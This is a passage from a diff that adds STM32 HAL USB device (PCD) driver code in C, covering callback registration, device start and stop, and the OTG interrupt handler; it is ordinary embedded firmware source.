HAL_PCD_RESET_CB_ID USB PCD Reset callback ID + * @arg @ref HAL_PCD_SUSPEND_CB_ID USB PCD Suspend callback ID + * @arg @ref HAL_PCD_RESUME_CB_ID USB PCD Resume callback ID + * @arg @ref HAL_PCD_CONNECT_CB_ID USB PCD Connect callback ID + * @arg @ref HAL_PCD_DISCONNECT_CB_ID OTG PCD Disconnect callback ID + * @arg @ref HAL_PCD_MSPINIT_CB_ID MspDeInit callback ID + * @arg @ref HAL_PCD_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_UnRegisterCallback(PCD_HandleTypeDef *hpcd, HAL_PCD_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hpcd); + + /* Setup Legacy weak Callbacks */ + if (hpcd->State == HAL_PCD_STATE_READY) + { + switch (CallbackID) + { + case HAL_PCD_SOF_CB_ID : + hpcd->SOFCallback = HAL_PCD_SOFCallback; + break; + + case HAL_PCD_SETUPSTAGE_CB_ID : + hpcd->SetupStageCallback = HAL_PCD_SetupStageCallback; + break; + + case HAL_PCD_RESET_CB_ID : + hpcd->ResetCallback = HAL_PCD_ResetCallback; + break; + + case HAL_PCD_SUSPEND_CB_ID : + hpcd->SuspendCallback = HAL_PCD_SuspendCallback; + break; + + case HAL_PCD_RESUME_CB_ID : + hpcd->ResumeCallback = HAL_PCD_ResumeCallback; + break; + + case HAL_PCD_CONNECT_CB_ID : + hpcd->ConnectCallback = HAL_PCD_ConnectCallback; + break; + + case HAL_PCD_DISCONNECT_CB_ID : + hpcd->DisconnectCallback = HAL_PCD_DisconnectCallback; + break; + + case HAL_PCD_MSPINIT_CB_ID : + hpcd->MspInitCallback = HAL_PCD_MspInit; + break; + + case HAL_PCD_MSPDEINIT_CB_ID : + hpcd->MspDeInitCallback = HAL_PCD_MspDeInit; + break; + + default : + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hpcd->State == HAL_PCD_STATE_RESET) + { + switch (CallbackID) + { + case HAL_PCD_MSPINIT_CB_ID : + hpcd->MspInitCallback = HAL_PCD_MspInit; + break; + + case HAL_PCD_MSPDEINIT_CB_ID : + hpcd->MspDeInitCallback = HAL_PCD_MspDeInit; + break; + + default : + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + return status; +} + +/** + * @brief Register USB PCD Data OUT Stage Callback + * To be used instead of the weak HAL_PCD_DataOutStageCallback() predefined callback + * @param hpcd PCD handle + * @param pCallback pointer to the USB PCD Data OUT Stage Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_RegisterDataOutStageCallback(PCD_HandleTypeDef *hpcd, + pPCD_DataOutStageCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hpcd); + + if (hpcd->State == HAL_PCD_STATE_READY) + { + hpcd->DataOutStageCallback = pCallback; + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + + return status; +} + +/** + * @brief Unregister the USB PCD Data OUT Stage Callback + * USB PCD Data OUT Stage Callback is redirected to the weak HAL_PCD_DataOutStageCallback() predefined callback + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_UnRegisterDataOutStageCallback(PCD_HandleTypeDef *hpcd) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hpcd); + + if (hpcd->State == HAL_PCD_STATE_READY) + { + hpcd->DataOutStageCallback = HAL_PCD_DataOutStageCallback; /* Legacy weak DataOutStageCallback */ + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + + return status; +} + +/** + * @brief Register USB PCD Data IN Stage Callback + * To be used instead of the weak HAL_PCD_DataInStageCallback() predefined callback + * @param hpcd PCD handle + * @param pCallback pointer to the USB PCD Data IN Stage Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_RegisterDataInStageCallback(PCD_HandleTypeDef *hpcd, + pPCD_DataInStageCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hpcd); + + if (hpcd->State == HAL_PCD_STATE_READY) + { + hpcd->DataInStageCallback = pCallback; + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + + return status; +} + +/** + * @brief Unregister the USB PCD Data IN Stage Callback + * USB PCD Data OUT Stage Callback is redirected to the weak HAL_PCD_DataInStageCallback() predefined callback + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_UnRegisterDataInStageCallback(PCD_HandleTypeDef *hpcd) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hpcd); + + if (hpcd->State == HAL_PCD_STATE_READY) + { + hpcd->DataInStageCallback = HAL_PCD_DataInStageCallback; /* Legacy weak DataInStageCallback */ + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + + return status; +} + +/** + * @brief Register USB PCD Iso OUT incomplete Callback + * To be used instead of the weak HAL_PCD_ISOOUTIncompleteCallback() predefined callback + * @param hpcd PCD handle + * @param pCallback pointer to the USB PCD Iso OUT incomplete Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_RegisterIsoOutIncpltCallback(PCD_HandleTypeDef *hpcd, + pPCD_IsoOutIncpltCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hpcd); + + if (hpcd->State == HAL_PCD_STATE_READY) + { + hpcd->ISOOUTIncompleteCallback = pCallback; + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + + return status; +} + +/** + * @brief Unregister the USB PCD Iso OUT incomplete Callback + * USB PCD Iso OUT incomplete Callback is redirected + * to the weak HAL_PCD_ISOOUTIncompleteCallback() predefined callback + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_UnRegisterIsoOutIncpltCallback(PCD_HandleTypeDef *hpcd) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hpcd); + + if (hpcd->State == HAL_PCD_STATE_READY) + { + hpcd->ISOOUTIncompleteCallback = HAL_PCD_ISOOUTIncompleteCallback; /* Legacy weak ISOOUTIncompleteCallback */ + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + + return status; +} + +/** + * @brief Register USB PCD Iso IN incomplete Callback + * To be used instead of the weak HAL_PCD_ISOINIncompleteCallback() predefined callback + * @param hpcd PCD handle + * @param pCallback pointer to the USB PCD Iso IN incomplete Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_RegisterIsoInIncpltCallback(PCD_HandleTypeDef *hpcd, + pPCD_IsoInIncpltCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hpcd); + + if (hpcd->State == HAL_PCD_STATE_READY) + { + hpcd->ISOINIncompleteCallback = pCallback; + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + + return status; +} + +/** + * @brief Unregister the USB PCD Iso IN incomplete Callback + * USB PCD Iso IN incomplete Callback is redirected + * to the weak HAL_PCD_ISOINIncompleteCallback() predefined callback + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_UnRegisterIsoInIncpltCallback(PCD_HandleTypeDef *hpcd) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hpcd); + + if (hpcd->State == HAL_PCD_STATE_READY) + { + hpcd->ISOINIncompleteCallback = HAL_PCD_ISOINIncompleteCallback; /* Legacy weak ISOINIncompleteCallback */ + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + + return status; +} + +/** + * @brief Register USB PCD BCD Callback + * To be used instead of the weak HAL_PCDEx_BCD_Callback() predefined callback + * @param hpcd PCD handle + * @param pCallback pointer to the USB PCD BCD Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_RegisterBcdCallback(PCD_HandleTypeDef *hpcd, pPCD_BcdCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hpcd); + + if (hpcd->State == HAL_PCD_STATE_READY) + { + hpcd->BCDCallback = pCallback; + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + + return status; +} + +/** + * @brief Unregister the USB PCD BCD Callback + * USB BCD Callback is redirected to the weak HAL_PCDEx_BCD_Callback() predefined callback + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_UnRegisterBcdCallback(PCD_HandleTypeDef *hpcd) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hpcd); + + if (hpcd->State == HAL_PCD_STATE_READY) + { + hpcd->BCDCallback = HAL_PCDEx_BCD_Callback; /* Legacy weak HAL_PCDEx_BCD_Callback */ + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + + return status; +} + +/** + * @brief Register USB PCD LPM Callback + * To be used instead of the weak HAL_PCDEx_LPM_Callback() predefined callback + * @param hpcd PCD handle + * @param pCallback pointer to the USB PCD LPM Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_RegisterLpmCallback(PCD_HandleTypeDef *hpcd, pPCD_LpmCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hpcd); + + if (hpcd->State == HAL_PCD_STATE_READY) + { + hpcd->LPMCallback = pCallback; + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + + return status; +} + +/** + * @brief Unregister the USB PCD LPM Callback + * USB LPM Callback is redirected to the weak HAL_PCDEx_LPM_Callback() predefined callback + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_UnRegisterLpmCallback(PCD_HandleTypeDef *hpcd) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hpcd); + + if (hpcd->State == HAL_PCD_STATE_READY) + { + hpcd->LPMCallback = HAL_PCDEx_LPM_Callback; /* Legacy weak HAL_PCDEx_LPM_Callback */ + } + else + { + /* Update the error code */ + hpcd->ErrorCode |= HAL_PCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hpcd); + + return status; +} +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup PCD_Exported_Functions_Group2 Input and Output operation functions + * @brief Data transfers functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to manage the PCD data + transfers. + +@endverbatim + * @{ + */ + +/** + * @brief Start the USB device + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_Start(PCD_HandleTypeDef *hpcd) +{ + USB_OTG_GlobalTypeDef *USBx = hpcd->Instance; + + __HAL_LOCK(hpcd); + + if ((hpcd->Init.battery_charging_enable == 1U) && + (hpcd->Init.phy_itface != USB_OTG_ULPI_PHY)) + { + /* Enable USB Transceiver */ + USBx->GCCFG |= USB_OTG_GCCFG_PWRDWN; + } + + __HAL_PCD_ENABLE(hpcd); + (void)USB_DevConnect(hpcd->Instance); + __HAL_UNLOCK(hpcd); + + return HAL_OK; +} + +/** + * @brief Stop the USB device. + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCD_Stop(PCD_HandleTypeDef *hpcd) +{ + USB_OTG_GlobalTypeDef *USBx = hpcd->Instance; + + __HAL_LOCK(hpcd); + __HAL_PCD_DISABLE(hpcd); + (void)USB_DevDisconnect(hpcd->Instance); + + (void)USB_FlushTxFifo(hpcd->Instance, 0x10U); + + if ((hpcd->Init.battery_charging_enable == 1U) && + (hpcd->Init.phy_itface != USB_OTG_ULPI_PHY)) + { + /* Disable USB Transceiver */ + USBx->GCCFG &= ~(USB_OTG_GCCFG_PWRDWN); + } + + __HAL_UNLOCK(hpcd); + + return HAL_OK; +} + +#if defined (USB_OTG_FS) || defined (USB_OTG_HS) +/** + * @brief Handles PCD interrupt request. + * @param hpcd PCD handle + * @retval HAL status + */ +void HAL_PCD_IRQHandler(PCD_HandleTypeDef *hpcd) +{ + USB_OTG_GlobalTypeDef *USBx = hpcd->Instance; + uint32_t USBx_BASE = (uint32_t)USBx; + USB_OTG_EPTypeDef *ep; + uint32_t i; + uint32_t ep_intr; + uint32_t epint; + uint32_t epnum; + uint32_t fifoemptymsk; + uint32_t temp; + + /* ensure that we are in device mode */ + if (USB_GetMode(hpcd->Instance) == USB_OTG_MODE_DEVICE) + { + /* avoid spurious interrupt */ + if (__HAL_PCD_IS_INVALID_INTERRUPT(hpcd)) + { + return; + } + + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_MMIS)) + { + /* incorrect mode, acknowledge the interrupt */ + __HAL_PCD_CLEAR_FLAG(hpcd, USB_OTG_GINTSTS_MMIS); + } + + /* Handle RxQLevel Interrupt */ + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_RXFLVL)) + { + USB_MASK_INTERRUPT(hpcd->Instance, USB_OTG_GINTSTS_RXFLVL); + + temp = USBx->GRXSTSP; + + ep = &hpcd->OUT_ep[temp & USB_OTG_GRXSTSP_EPNUM]; + + if (((temp & USB_OTG_GRXSTSP_PKTSTS) >> 17) == STS_DATA_UPDT) + { + if ((temp & USB_OTG_GRXSTSP_BCNT) != 0U) + { + (void)USB_ReadPacket(USBx, ep->xfer_buff, + (uint16_t)((temp & USB_OTG_GRXSTSP_BCNT) >> 4)); + + ep->xfer_buff += (temp & USB_OTG_GRXSTSP_BCNT) >> 4; + ep->xfer_count += (temp & USB_OTG_GRXSTSP_BCNT) >> 4; + } + } + else if (((temp & USB_OTG_GRXSTSP_PKTSTS) >> 17) == STS_SETUP_UPDT) + { + (void)USB_ReadPacket(USBx, (uint8_t *)hpcd->Setup, 8U); + ep->xfer_count += (temp & USB_OTG_GRXSTSP_BCNT) >> 4; + } + else + { + /* ... */ + } + USB_UNMASK_INTERRUPT(hpcd->Instance, USB_OTG_GINTSTS_RXFLVL); + } + + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_OEPINT)) + { + epnum = 0U; + + /* Read in the device interrupt bits */ + ep_intr = USB_ReadDevAllOutEpInterrupt(hpcd->Instance); + + while (ep_intr != 0U) + { + if ((ep_intr & 0x1U) != 0U) + { + epint = USB_ReadDevOutEPInterrupt(hpcd->Instance, (uint8_t)epnum); + + if ((epint & USB_OTG_DOEPINT_XFRC) == USB_OTG_DOEPINT_XFRC) + { + CLEAR_OUT_EP_INTR(epnum, USB_OTG_DOEPINT_XFRC); + (void)PCD_EP_OutXfrComplete_int(hpcd, epnum); + } + + if ((epint & USB_OTG_DOEPINT_STUP) == USB_OTG_DOEPINT_STUP) + { + CLEAR_OUT_EP_INTR(epnum, USB_OTG_DOEPINT_STUP); + /* Class B setup phase done for previous decoded setup */ + (void)PCD_EP_OutSetupPacket_int(hpcd, epnum); + } + + if ((epint & USB_OTG_DOEPINT_OTEPDIS) == USB_OTG_DOEPINT_OTEPDIS) + { + CLEAR_OUT_EP_INTR(epnum, USB_OTG_DOEPINT_OTEPDIS); + } + + /* Clear Status Phase Received interrupt */ + if ((epint & USB_OTG_DOEPINT_OTEPSPR) == USB_OTG_DOEPINT_OTEPSPR) + { + CLEAR_OUT_EP_INTR(epnum, USB_OTG_DOEPINT_OTEPSPR); + } + + /* Clear OUT NAK interrupt */ + if ((epint & USB_OTG_DOEPINT_NAK) == USB_OTG_DOEPINT_NAK) + { + CLEAR_OUT_EP_INTR(epnum, USB_OTG_DOEPINT_NAK); + } + } + epnum++; + ep_intr >>= 1U; + } + } + + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_IEPINT)) + { + /* Read in the device interrupt bits */ + ep_intr = USB_ReadDevAllInEpInterrupt(hpcd->Instance); + + epnum = 0U; + + while (ep_intr != 0U) + { + if ((ep_intr & 0x1U) != 0U) /* In ITR */ + { + epint = USB_ReadDevInEPInterrupt(hpcd->Instance, (uint8_t)epnum); + + if ((epint & USB_OTG_DIEPINT_XFRC) == USB_OTG_DIEPINT_XFRC) + { + fifoemptymsk = (uint32_t)(0x1UL << (epnum & EP_ADDR_MSK)); + USBx_DEVICE->DIEPEMPMSK &= ~fifoemptymsk; + + CLEAR_IN_EP_INTR(epnum, USB_OTG_DIEPINT_XFRC); + + if (hpcd->Init.dma_enable == 1U) + { + hpcd->IN_ep[epnum].xfer_buff += hpcd->IN_ep[epnum].maxpacket; + + /* this is ZLP, so prepare EP0 for next setup */ + if ((epnum == 0U) && (hpcd->IN_ep[epnum].xfer_len == 0U)) + { + /* prepare to rx more setup packets */ + (void)USB_EP0_OutStart(hpcd->Instance, 1U, (uint8_t *)hpcd->Setup); + } + } + +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->DataInStageCallback(hpcd, (uint8_t)epnum); +#else + HAL_PCD_DataInStageCallback(hpcd, (uint8_t)epnum); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + if ((epint & USB_OTG_DIEPINT_TOC) == USB_OTG_DIEPINT_TOC) + { + CLEAR_IN_EP_INTR(epnum, USB_OTG_DIEPINT_TOC); + } + if ((epint & USB_OTG_DIEPINT_ITTXFE) == USB_OTG_DIEPINT_ITTXFE) + { + CLEAR_IN_EP_INTR(epnum, USB_OTG_DIEPINT_ITTXFE); + } + if ((epint & USB_OTG_DIEPINT_INEPNE) == USB_OTG_DIEPINT_INEPNE) + { + CLEAR_IN_EP_INTR(epnum, USB_OTG_DIEPINT_INEPNE); + } + if ((epint & USB_OTG_DIEPINT_EPDISD) == USB_OTG_DIEPINT_EPDISD) + { + CLEAR_IN_EP_INTR(epnum, USB_OTG_DIEPINT_EPDISD); + } + if ((epint & USB_OTG_DIEPINT_TXFE) == USB_OTG_DIEPINT_TXFE) + { + (void)PCD_WriteEmptyTxFifo(hpcd, epnum); + } + } + epnum++; + ep_intr >>= 1U; + } + } + + /* Handle Resume Interrupt */ + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_WKUINT)) + { + /* Clear the Remote Wake-up Signaling */ + USBx_DEVICE->DCTL &= ~USB_OTG_DCTL_RWUSIG; + + if (hpcd->LPM_State == LPM_L1) + { + hpcd->LPM_State = LPM_L0; + +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->LPMCallback(hpcd, PCD_LPM_L0_ACTIVE); +#else + HAL_PCDEx_LPM_Callback(hpcd, PCD_LPM_L0_ACTIVE); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + else + { +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->ResumeCallback(hpcd); +#else + HAL_PCD_ResumeCallback(hpcd); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + + __HAL_PCD_CLEAR_FLAG(hpcd, USB_OTG_GINTSTS_WKUINT); + } + + /* Handle Suspend Interrupt */ + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_USBSUSP)) + { + if ((USBx_DEVICE->DSTS & USB_OTG_DSTS_SUSPSTS) == USB_OTG_DSTS_SUSPSTS) + { +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->SuspendCallback(hpcd); +#else + HAL_PCD_SuspendCallback(hpcd); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + __HAL_PCD_CLEAR_FLAG(hpcd, USB_OTG_GINTSTS_USBSUSP); + } +#if defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) + /* Handle LPM Interrupt */ + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_LPMINT)) + { + __HAL_PCD_CLEAR_FLAG(hpcd, USB_OTG_GINTSTS_LPMINT); + + if (hpcd->LPM_State == LPM_L0) + { + hpcd->LPM_State = LPM_L1; + hpcd->BESL = (hpcd->Instance->GLPMCFG & USB_OTG_GLPMCFG_BESL) >> 2U; + +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->LPMCallback(hpcd, PCD_LPM_L1_ACTIVE); +#else + HAL_PCDEx_LPM_Callback(hpcd, PCD_LPM_L1_ACTIVE); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + else + { +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->SuspendCallback(hpcd); +#else + HAL_PCD_SuspendCallback(hpcd); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + } +#endif /* defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) */ + /* Handle Reset Interrupt */ + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_USBRST)) + { + USBx_DEVICE->DCTL &= ~USB_OTG_DCTL_RWUSIG; + (void)USB_FlushTxFifo(hpcd->Instance, 0x10U); + + for (i = 0U; i < hpcd->Init.dev_endpoints; i++) + { + USBx_INEP(i)->DIEPINT = 0xFB7FU; + USBx_INEP(i)->DIEPCTL &= ~USB_OTG_DIEPCTL_STALL; + USBx_INEP(i)->DIEPCTL |= USB_OTG_DIEPCTL_SNAK; + USBx_OUTEP(i)->DOEPINT = 0xFB7FU; + USBx_OUTEP(i)->DOEPCTL &= ~USB_OTG_DOEPCTL_STALL; + USBx_OUTEP(i)->DOEPCTL |= USB_OTG_DOEPCTL_SNAK; + } + USBx_DEVICE->DAINTMSK |= 0x10001U; + + if (hpcd->Init.use_dedicated_ep1 != 0U) + { + USBx_DEVICE->DOUTEP1MSK |= USB_OTG_DOEPMSK_STUPM | + USB_OTG_DOEPMSK_XFRCM | + USB_OTG_DOEPMSK_EPDM; + + USBx_DEVICE->DINEP1MSK |= USB_OTG_DIEPMSK_TOM | + USB_OTG_DIEPMSK_XFRCM | + USB_OTG_DIEPMSK_EPDM; + } + else + { + USBx_DEVICE->DOEPMSK |= USB_OTG_DOEPMSK_STUPM | + USB_OTG_DOEPMSK_XFRCM | + USB_OTG_DOEPMSK_EPDM | + USB_OTG_DOEPMSK_OTEPSPRM | + USB_OTG_DOEPMSK_NAKM; + + USBx_DEVICE->DIEPMSK |= USB_OTG_DIEPMSK_TOM | + USB_OTG_DIEPMSK_XFRCM | + USB_OTG_DIEPMSK_EPDM; + } + + /* Set Default Address to 0 */ + USBx_DEVICE->DCFG &= ~USB_OTG_DCFG_DAD; + + /* setup EP0 to receive SETUP packets */ + (void)USB_EP0_OutStart(hpcd->Instance, (uint8_t)hpcd->Init.dma_enable, + (uint8_t *)hpcd->Setup); + + __HAL_PCD_CLEAR_FLAG(hpcd, USB_OTG_GINTSTS_USBRST); + } + + /* Handle Enumeration done Interrupt */ + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_ENUMDNE)) + { + (void)USB_ActivateSetup(hpcd->Instance); + hpcd->Init.speed = USB_GetDevSpeed(hpcd->Instance); + + /* Set USB Turnaround time */ + (void)USB_SetTurnaroundTime(hpcd->Instance, + HAL_RCC_GetHCLKFreq(), + (uint8_t)hpcd->Init.speed); + +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->ResetCallback(hpcd); +#else + HAL_PCD_ResetCallback(hpcd); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + + __HAL_PCD_CLEAR_FLAG(hpcd, USB_OTG_GINTSTS_ENUMDNE); + } + + /* Handle SOF Interrupt */ + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_SOF)) + { +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->SOFCallback(hpcd); +#else + HAL_PCD_SOFCallback(hpcd); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + + __HAL_PCD_CLEAR_FLAG(hpcd, USB_OTG_GINTSTS_SOF); + } + + /* Handle Incomplete ISO IN Interrupt */ + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_IISOIXFR)) + { + /* Keep application checking the corresponding Iso IN endpoint + causing the incomplete Interrupt */ + epnum = 0U; + +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->ISOINIncompleteCallback(hpcd, (uint8_t)epnum); +#else + HAL_PCD_ISOINIncompleteCallback(hpcd, (uint8_t)epnum); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + + __HAL_PCD_CLEAR_FLAG(hpcd, USB_OTG_GINTSTS_IISOIXFR); + } + + /* Handle Incomplete ISO OUT Interrupt */ + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_PXFR_INCOMPISOOUT)) + { + /* Keep application checking the corresponding Iso OUT endpoint + causing the incomplete Interrupt */ + epnum = 0U; + +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->ISOOUTIncompleteCallback(hpcd, (uint8_t)epnum); +#else + HAL_PCD_ISOOUTIncompleteCallback(hpcd, (uint8_t)epnum); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + + __HAL_PCD_CLEAR_FLAG(hpcd, USB_OTG_GINTSTS_PXFR_INCOMPISOOUT); + } + + /* Handle Connection event Interrupt */ + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_SRQINT)) + { +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->ConnectCallback(hpcd); +#else + HAL_PCD_ConnectCallback(hpcd); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + + __HAL_PCD_CLEAR_FLAG(hpcd, USB_OTG_GINTSTS_SRQINT); + } + + /* Handle Disconnection event Interrupt */ + if (__HAL_PCD_GET_FLAG(hpcd, USB_OTG_GINTSTS_OTGINT)) + { + temp = hpcd->Instance->GOTGINT; + + if ((temp & USB_OTG_GOTGINT_SEDET) == USB_OTG_GOTGINT_SEDET) + { +#if (USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->DisconnectCallback(hpcd); +#else + HAL_PCD_DisconnectCallback(hpcd); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ + } + hpcd->Instance->GOTGINT |= temp; + } + } +} + + +/** + * @brief Handles PCD Wakeup interrupt request. + * @param hpcd PCD handle + * @retval HAL status + */ +void 